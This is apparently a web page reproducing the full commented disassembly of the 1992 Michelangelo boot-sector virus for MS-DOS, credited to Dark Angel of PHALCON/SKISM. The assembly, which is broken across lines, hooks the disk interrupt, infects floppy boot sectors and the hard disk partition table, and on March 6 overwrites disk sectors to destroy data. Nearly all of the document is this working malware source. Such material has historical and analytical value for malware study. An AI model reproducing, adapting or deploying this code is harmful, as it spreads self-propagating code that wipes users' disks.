"Michelangelo" virus source code
This is the commented source code in assembly of the virus "Michelangelo" for MS-DOS, created in 1992 and activated every year on March, 6 (the Italian artist Michelangelo was born on March, 6 1475 in Caprese, near Arezzo).
; This is a disassembly of the much-hyped michelangelo virus.
; As you can see, it is a derivative of the Stoned virus. The
; junk bytes at the end of the file are probably throwbacks to
; the Stoned virus. In any case, it is yet another boot sector
; and partition table infector.
michelangelo segment byte public
assume
cs:michelangelo, ds:michelangelo
; Disassembly by Dark Angel of PHALCON/SKISM
org
0
jmp
entervirus
highmemjmp db 0F5h,
00h, 80h, 9Fh
maxhead db 2
;
used by damagestuff
firstsector dw 3
oldint13h dd 0C8000256h
int13h:
push
ds
push
ax
or
dl, dl ;
default drive?
jnz
exitint13h ;
exit if not
xor
ax, ax
mov
ds, ax
test
byte ptr ds:[43fh], 1 ; disk 0 on?
jnz
exitint13h ;
if not spinning, exit
pop
ax
pop
ds
pushf
call
dword ptr cs:[oldint13h]; first call old int 13h
pushf
call
infectdisk ;
then infect
popf
retf
2
exitint13h: pop ax
pop
ds
jmp
dword ptr cs:[oldint13h]
infectdisk:
push
ax
push
bx
push
cx
push
dx
push
ds
push
es
push
si
push
di
push
cs
pop
ds
push
cs
pop
es
mov
si, 4
readbootblock:
mov
ax,201h ;
Read boot block to
mov
bx,200h ;
after virus
mov
cx,1
xor
dx,dx
pushf
call
oldint13h
jnc
checkinfect ;
continue if no error
xor
ax,ax
pushf
call
oldint13h ;
Reset disk
dec
si ;
loop back
jnz
readbootblock
jmp
short quitinfect ;
exit if too many failures
checkinfect:
xor
si,si
cld
lodsw
cmp
ax,[bx] ;
check if already infected
jne
infectitnow
lodsw
cmp
ax,[bx+2] ;
check again
je
quitinfect
infectitnow:
mov
ax,301h ;
Write old boot block
mov
dh,1 ;
to head 1
mov
cl,3 ;
sector 3
cmp
byte ptr [bx+15h],0FDh ; 360k disk?
je
is360Kdisk
mov
cl,0Eh
is360Kdisk:
mov
firstsector,cx
pushf
call
oldint13h
jc
quitinfect ;
exit on error
mov
si,200h+offset partitioninfo
mov
di,offset partitioninfo
mov
cx,21h ;
Copy partition table
cld
rep
movsw
mov
ax,301h ;
Write virus to sector 1
xor
bx,bx
mov
cx,1
xor
dx,dx
pushf
call
oldint13h
quitinfect:
pop
di
pop
si
pop
es
pop
ds
pop
dx
pop
cx
pop
bx
pop
ax
retn
entervirus:
xor
ax,ax
mov
ds,ax
cli
mov
ss,ax
mov
ax,7C00h ;
Set stack to just below
mov
sp,ax ;
virus load point
sti
push
ds ;
save 0:7C00h on stack for
push
ax ;
later retf
mov
ax,ds:[13h*4]
mov
word ptr ds:[7C00h+offset oldint13h],ax
mov
ax,ds:[13h*4+2]
mov
word ptr ds:[7C00h+offset oldint13h+2],ax
mov
ax,ds:[413h] ;
memory size in K
dec
ax ;
1024 K
dec
ax
mov
ds:[413h],ax ;
move new value in
mov
cl,6
shl
ax,cl ;
ax = paragraphs of memory
mov
es,ax ;
next line sets seg of jmp
mov
word ptr ds:[7C00h+2+offset highmemjmp],ax
mov
ax,offset int13h
mov
ds:[13h*4],ax
mov
ds:[13h*4+2],es
mov
cx,offset partitioninfo
mov
si,7C00h
xor
di,di
cld
rep
movsb ;
copy to high memory
;
and transfer control there
jmp
dword ptr cs:[7C00h+offset highmemjmp]
; destination of highmem jmp
xor
ax,ax
mov
es,ax
int
13h ;
reset disk
push
cs
pop
ds
mov
ax,201h
mov
bx,7C00h
mov
cx,firstsector
cmp
cx,7 ;
hard disk infection?
jne
floppyboot ;
if not, do floppies
mov
dx,80h ;
Read old partition table of
int
13h ;
first hard disk to 0:7C00h
jmp
short exitvirus
floppyboot:
mov
cx,firstsector ;
read old boot block
mov
dx,100h ;
to 0:7C00h
int
13h
jc
exitvirus
push
cs
pop
es
mov
ax,201h ;
read boot block
mov
bx,200h ;
of first hard disk
mov
cx,1
mov
dx,80h
int
13h
jc
exitvirus
xor
si,si
cld
lodsw
cmp
ax,[bx] ;
is it infected?
jne
infectharddisk ;
if not, infect HD
lodsw
;
check infection
cmp
ax,[bx+2]
jne
infectharddisk
exitvirus:
xor
cx,cx ;
Real time clock get date
mov
ah,4 ;
dx = mon/day
int
1Ah
cmp
dx,306h ;
March 6th
je
damagestuff
retf
;
return control to original
;
boot block @ 0:7C00h
damagestuff:
xor
dx,dx
mov
cx,1
smashanothersector:
mov
ax,309h
mov
si,firstsector
cmp
si,3
je
smashit
mov
al,0Eh
cmp
si,0Eh
je
smashit
mov
dl,80h ;
first hard disk
mov
maxhead,4
mov
al,11h
smashit:
mov
bx,5000h ;
random memory area
mov
es,bx ;
at 5000h:5000h
int
13h ;
Write al sectors to drive dl
jnc
skiponerror ;
skip on error
xor
ah,ah ;
Reset disk drive dl
int
13h
skiponerror:
inc
dh ;
next head
cmp
dh,maxhead ;
2 if floppy, 4 if HD
jb
smashanothersector
xor
dh,dh ;
go to next head/cylinder
inc
ch
jmp
short smashanothersector
infectharddisk:
mov
cx,7 ;
Write partition table to
mov
firstsector,cx ;
sector 7
mov
ax,301h
mov
dx,80h
int
13h
jc
exitvirus
mov
si,200h+offset partitioninfo ; Copy partition
mov
di,offset partitioninfo ;
table information
mov
cx,21h
rep
movsw
mov
ax,301h ;
Write to sector 8
xor
bx,bx ;
Copy virus to sector 1
inc
cl
int
13h
;* jmp
short 01E0h
db
0EBh, 32h ;
?This should crash?
; The following bytes are meaningless.
garbage db 1,4,11h,0,80h,0,5,5,32h,1,0,0,0,0,0,53h
partitioninfo: db 42h dup (0)
michelangelo ends
end